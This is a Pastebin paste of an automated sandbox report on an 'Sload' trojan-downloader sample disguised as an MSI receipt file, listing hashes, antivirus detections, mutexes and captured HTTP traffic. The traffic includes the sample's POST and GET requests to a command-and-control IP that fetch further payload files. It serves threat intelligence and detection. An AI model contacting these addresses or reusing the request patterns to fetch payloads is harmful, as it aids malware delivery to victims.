Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- * MalFamily: "Sload"
- * MalScore: 8.1
- * File Name: "XCDXSED_COMPROBANTE_NSHSG_82829N_2019.msi"
- * File Size: 28672
- * File Type: "Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Microsoft Installer, Author: cfyveqkn, Keywords: Installer, Comments: This installer database contains the logic and data required to install Microsoft Installer., Template: Intel;1033, Revision Number: FF7C1356-1066-4504-9B96-F11732241BBE Create Time/Date: Tue Aug 13 02:22:50 2019, Last Saved Time/Date: Tue Aug 13 02:22:50 2019, Number of Pages: 200, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.11.1.2318), Security: 2"
- * SHA256: "b03641f8ced65f0977feb0c13a3609e976818c47a4fdaafbd65cf5197ab10cb0"
- * MD5: "5f44643f4c331503d3a4b64f72097b3a"
- * SHA1: "b2e17c918abe854493a9210867f97065795f820f"
- * SHA512: "3563ad26f556044a4444114fbd0175a1bd037352c63a96601c2ff0e1550ee5edcea947e380676487b63b84317178760219dee079264e577ed24046374160b611"
- * CRC32: "A609AA71"
- * SSDEEP: "192:ST+1Tgcw4VdT+lnPqFCQeIg5njLOnEoXlZENjH4wxF:11T9w4jTmnSFbTg5P9oXgNs6F"
- * Process Execution:
- "msiexec.exe"
- * Executed Commands:
- * Signatures Detected:
- "Description": "File has been identified by 2 Antiviruses on VirusTotal as malicious",
- "Details":
- "Kaspersky": "HEUR:Trojan-Downloader.VBS.SLoad.gen"
- "ZoneAlarm": "HEUR:Trojan-Downloader.VBS.SLoad.gen"
- "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
- "Details":
- "post_no_referer": "HTTP traffic contains a POST request with no referer header"
- "http_version_old": "HTTP traffic uses version 1.0"
- "ip_hostname": "HTTP connection was made to an IP address rather than domain name"
- "suspicious_request": "http://3.15.160.35/v14/thu1.php"
- "suspicious_request": "http://3.15.160.35/v14/mqxa.php"
- "suspicious_request": "http://3.15.160.35/v14/m/mqx160.thu"
- "suspicious_request": "http://3.15.160.35/v14/mqxa1.thu"
- "suspicious_request": "http://3.15.160.35/v14/mqxasq.thu"
- "suspicious_request": "http://3.15.160.35/v14/mqxasl.thu"
- "suspicious_request": "http://3.15.160.35/v14/mqxass.thu"
- "suspicious_request": "http://3.15.160.35/v14/"
- "Description": "Performs some HTTP requests",
- "Details":
- "url": "http://3.15.160.35/v14/thu1.php"
- "url": "http://3.15.160.35/v14/mqxa.php"
- "url": "http://3.15.160.35/v14/m/mqx160.thu"
- "url": "http://3.15.160.35/v14/mqxa1.thu"
- "url": "http://3.15.160.35/v14/mqxasq.thu"
- "url": "http://3.15.160.35/v14/mqxasl.thu"
- "url": "http://3.15.160.35/v14/mqxass.thu"
- "url": "http://3.15.160.35/v14/"
- "Description": "Created network traffic indicative of malicious activity",
- "Details":
- "signature": "ET USER_AGENTS PTsecurity Possible Trojan.Downloader UserAgent (binary_getter)"
- * Started Service:
- * Mutexes:
- "CicLoadWinStaWinSta0",
- "Local\\MSCTF.CtfMonitorInstMutexDefault1",
- "Global\\_MSIExecute"
- * Modified Files:
- * Deleted Files:
- * Modified Registry Keys:
- * Deleted Registry Keys:
- * DNS Communications:
- * Domains:
- * Network Communication - ICMP:
- * Network Communication - HTTP:
- "count": 2,
- "body": "",
- "uri": "http://3.15.160.35/v14/thu1.php",
- "user-agent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)",
- "method": "POST",
- "host": "3.15.160.35",
- "version": "1.1",
- "path": "/v14/thu1.php",
- "data": "POST /v14/thu1.php HTTP/1.1\r\nAccept: */*\r\nAccept-Language: en-us\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)\r\nHost: 3.15.160.35\r\nContent-Length: 3\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://3.15.160.35/v14/mqxa.php",
- "user-agent": "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)",
- "method": "GET",
- "host": "3.15.160.35",
- "version": "1.1",
- "path": "/v14/mqxa.php",
- "data": "GET /v14/mqxa.php HTTP/1.1\r\nConnection: Keep-Alive\r\nContent-Type: text/xml\r\nAccept: */*\r\nUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)\r\nHost: 3.15.160.35\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://3.15.160.35/v14/m/mqx160.thu",
- "user-agent": "binary_getter/1.0",
- "method": "GET",
- "host": "3.15.160.35",
- "version": "1.1",
- "path": "/v14/m/mqx160.thu",
- "data": "GET /v14/m/mqx160.thu HTTP/1.1\r\nConnection: Keep-Alive\r\nContent-Type: text/plain; Charset=UTF-8\r\nAccept: */*\r\nUser-Agent: binary_getter/1.0\r\nHost: 3.15.160.35\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://3.15.160.35/v14/mqxa1.thu",
- "user-agent": "binary_getter/1.0",
- "method": "GET",
- "host": "3.15.160.35",
- "version": "1.1",
- "path": "/v14/mqxa1.thu",
- "data": "GET /v14/mqxa1.thu HTTP/1.1\r\nConnection: Keep-Alive\r\nContent-Type: text/plain; Charset=UTF-8\r\nAccept: */*\r\nUser-Agent: binary_getter/1.0\r\nHost: 3.15.160.35\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://3.15.160.35/v14/mqxasq.thu",
- "user-agent": "binary_getter/1.0",
- "method": "GET",
- "host": "3.15.160.35",
- "version": "1.1",
- "path": "/v14/mqxasq.thu",
- "data": "GET /v14/mqxasq.thu HTTP/1.1\r\nConnection: Keep-Alive\r\nContent-Type: text/plain; Charset=UTF-8\r\nAccept: */*\r\nUser-Agent: binary_getter/1.0\r\nHost: 3.15.160.35\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://3.15.160.35/v14/mqxasl.thu",
- "user-agent": "binary_getter/1.0",
- "method": "GET",
- "host": "3.15.160.35",
- "version": "1.1",
- "path": "/v14/mqxasl.thu",
- "data": "GET /v14/mqxasl.thu HTTP/1.1\r\nConnection: Keep-Alive\r\nContent-Type: text/plain; Charset=UTF-8\r\nAccept: */*\r\nUser-Agent: binary_getter/1.0\r\nHost: 3.15.160.35\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://3.15.160.35/v14/mqxass.thu",
- "user-agent": "binary_getter/1.0",
- "method": "GET",
- "host": "3.15.160.35",
- "version": "1.1",
- "path": "/v14/mqxass.thu",
- "data": "GET /v14/mqxass.thu HTTP/1.1\r\nConnection: Keep-Alive\r\nContent-Type: text/plain; Charset=UTF-8\r\nAccept: */*\r\nUser-Agent: binary_getter/1.0\r\nHost: 3.15.160.35\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://3.15.160.35/v14/",
- "user-agent": "Mozilla/3.0 (compatible; Indy Library)",
- "method": "POST",
- "host": "3.15.160.35",
- "version": "1.0",
- "path": "/v14/",
- "data": "POST /v14/ HTTP/1.0\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 238\r\nHost: 3.15.160.35\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: identity\r\nUser-Agent: Mozilla/3.0 (compatible; Indy Library)\r\n\r\n",
- "port": 80
- * Network Communication - SMTP:
- * Network Communication - Hosts:
- * Network Communication - IRC:
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement